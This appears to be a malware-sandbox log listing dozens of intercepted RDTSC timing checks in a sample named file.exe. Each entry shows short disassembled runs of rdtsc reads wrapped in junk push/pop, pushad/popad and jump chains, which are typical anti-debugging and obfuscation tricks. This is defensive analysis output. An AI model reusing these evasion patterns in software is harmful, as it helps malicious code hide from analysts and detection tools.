Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA1679 second address: AA16A8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jc 00007FAD40FC0C56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FAD40FC0C64h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FAD40FC0C5Dh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA16A8 second address: AA16CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD6779h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA16CD second address: AA16D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA356E second address: AA358D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD40FD6772h 0x00000009 pop esi 0x0000000a pop ecx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA358D second address: AA3591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA9CE4 second address: AA9D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD40FD6776h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d jmp 00007FAD40FD6771h 0x00000012 pushad 0x00000013 popad 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jg 00007FAD40FD6766h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA9D1E second address: AA9D24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA9D24 second address: AA9D38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FD6770h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAA01B second address: AAA04F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAD40FC0C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAD40FC0C65h 0x00000012 jne 00007FAD40FC0C62h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAA04F second address: AAA055 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAA427 second address: AAA448 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FAD40FC0C68h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAA5B5 second address: AAA5BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAA5BB second address: AAA5C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAA5C6 second address: AAA5CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAA715 second address: AAA737 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C68h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF278 second address: AAF27E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB7BAE second address: AB7BDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FAD40FC0C5Ch 0x0000000c jl 00007FAD40FC0C56h 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007FAD40FC0C65h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB7BDD second address: AB7BF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD676Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB7D6F second address: AB7D9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C60h 0x00000007 push ecx 0x00000008 jnl 00007FAD40FC0C56h 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007FAD40FC0C58h 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jng 00007FAD40FC0C56h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB7D9D second address: AB7DA3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB8252 second address: AB826B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FAD40FC0C56h 0x0000000a jo 00007FAD40FC0C56h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB826B second address: AB826F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB86B1 second address: AB86BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FAD40FC0C56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB86BB second address: AB86FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD6778h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FAD40FD6772h 0x0000000e jmp 00007FAD40FD676Dh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pushad 0x00000018 popad 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB886A second address: AB886F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB886F second address: AB8875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB89D5 second address: AB89E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jc 00007FAD40FC0C56h 0x0000000c jc 00007FAD40FC0C56h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB928B second address: AB9296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB9A74 second address: AB9A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FAD40FC0C56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB774A second address: AB7753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC0DF5 second address: AC0E0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD40FC0C63h 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC0E0D second address: AC0E19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FAD40FD6766h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC0822 second address: AC083D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD40FC0C60h 0x00000009 jno 00007FAD40FC0C56h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC083D second address: AC0847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FAD40FD6766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACF9E2 second address: ACF9E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACF545 second address: ACF550 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnp 00007FAD40FD6766h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADF37D second address: ADF381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF381 second address: ADF385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF385 second address: ADF38F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF38F second address: ADF393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF214 second address: ADF21A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF21A second address: ADF25F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FAD40FD6775h 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007FAD40FD6779h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FAD40FD676Ah 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF25F second address: ADF263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01BA7 second address: A01BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FD676Bh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A01BB6 second address: A01BC4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAD40FC0C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6D52 second address: AE6D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE7149 second address: AE714F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE714F second address: AE715E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jno 00007FAD40FD6766h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE7454 second address: AE749A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C5Ch 0x00000007 jl 00007FAD40FC0C56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FAD40FC0C65h 0x00000015 jmp 00007FAD40FC0C64h 0x0000001a popad 0x0000001b pushad 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE749A second address: AE74A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE7606 second address: AE760C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEBA45 second address: AEBA4B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEBBE5 second address: AEBBE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF5567 second address: AF557B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FAD40FD6768h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF557B second address: AF5584 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCB67 second address: AFCB6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCB6B second address: AFCB98 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAD40FC0C65h 0x00000008 pushad 0x00000009 jmp 00007FAD40FC0C63h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFE18C second address: AFE19F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD676Eh 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E24F second address: B0E266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FAD40FC0C5Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E38A second address: B0E3A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jnc 00007FAD40FD6766h 0x0000000d jnl 00007FAD40FD6766h 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E3A0 second address: B0E3B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FC0C5Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B28504 second address: B2850A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2850A second address: B28515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FAD40FC0C56h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B27539 second address: B27545 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAD40FD676Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B27545 second address: B2755C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push edx 0x00000008 pop edx 0x00000009 ja 00007FAD40FC0C56h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2755C second address: B27569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FAD40FD6766h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B27830 second address: B2783F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FAD40FC0C5Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B27EBA second address: B27EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B27EBE second address: B27ED6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007FAD40FC0C56h 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29C13 second address: B29C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAD40FD6766h 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FAD40FD6771h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jmp 00007FAD40FD676Bh 0x0000001c popad 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2C5C7 second address: B2C5E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FAD40FC0C69h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2C5E9 second address: B2C5EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2C854 second address: B2C859 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2C859 second address: B2C8A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FAD40FD6768h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 jnc 00007FAD40FD6767h 0x00000028 push 00000004h 0x0000002a movsx edx, ax 0x0000002d push C2F5A85Eh 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 jmp 00007FAD40FD676Eh 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2C8A6 second address: B2C8AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2CBDB second address: B2CBFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD676Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAD40FD676Bh 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4356D second address: A43582 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007FAD40FC0C56h 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A43582 second address: A43586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D0428 second address: 47D042E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D042E second address: 47D0432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D0524 second address: 47D0578 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c jmp 00007FAD40FC0C60h 0x00000011 lea eax, dword ptr [ebp-04h] 0x00000014 jmp 00007FAD40FC0C60h 0x00000019 nop 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FAD40FC0C67h 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D0578 second address: 47D0590 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FD6774h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D0590 second address: 47D0594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D0594 second address: 47D05B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FAD40FD676Eh 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov di, 9130h 0x00000016 popad 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D061D second address: 47D0660 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FAD40FC0C66h 0x00000016 sub ch, FFFFFFC8h 0x00000019 jmp 00007FAD40FC0C5Bh 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D0660 second address: 47D0694 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 37E29D6Ah 0x00000008 call 00007FAD40FD676Bh 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov esi, eax 0x00000013 jmp 00007FAD40FD676Fh 0x00000018 je 00007FAD40FD67C7h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D0694 second address: 47D0698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D0698 second address: 47D069C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D069C second address: 47D06A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D06BB second address: 47D06C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D06C1 second address: 47D06D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FC0C5Bh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47D06D0 second address: 47D075D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD6779h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, esi 0x0000000d pushad 0x0000000e call 00007FAD40FD676Ch 0x00000013 mov edx, esi 0x00000015 pop esi 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FAD40FD676Dh 0x0000001d xor cl, FFFFFFB6h 0x00000020 jmp 00007FAD40FD6771h 0x00000025 popfd 0x00000026 mov ax, A5A7h 0x0000002a popad 0x0000002b popad 0x0000002c pop esi 0x0000002d jmp 00007FAD40FD676Ah 0x00000032 leave 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007FAD40FD676Eh 0x0000003a add ecx, 4EA1DE08h 0x00000040 jmp 00007FAD40FD676Bh 0x00000045 popfd 0x00000046 push eax 0x00000047 push edx 0x00000048 mov cl, ECh 0x0000004a rdtsc
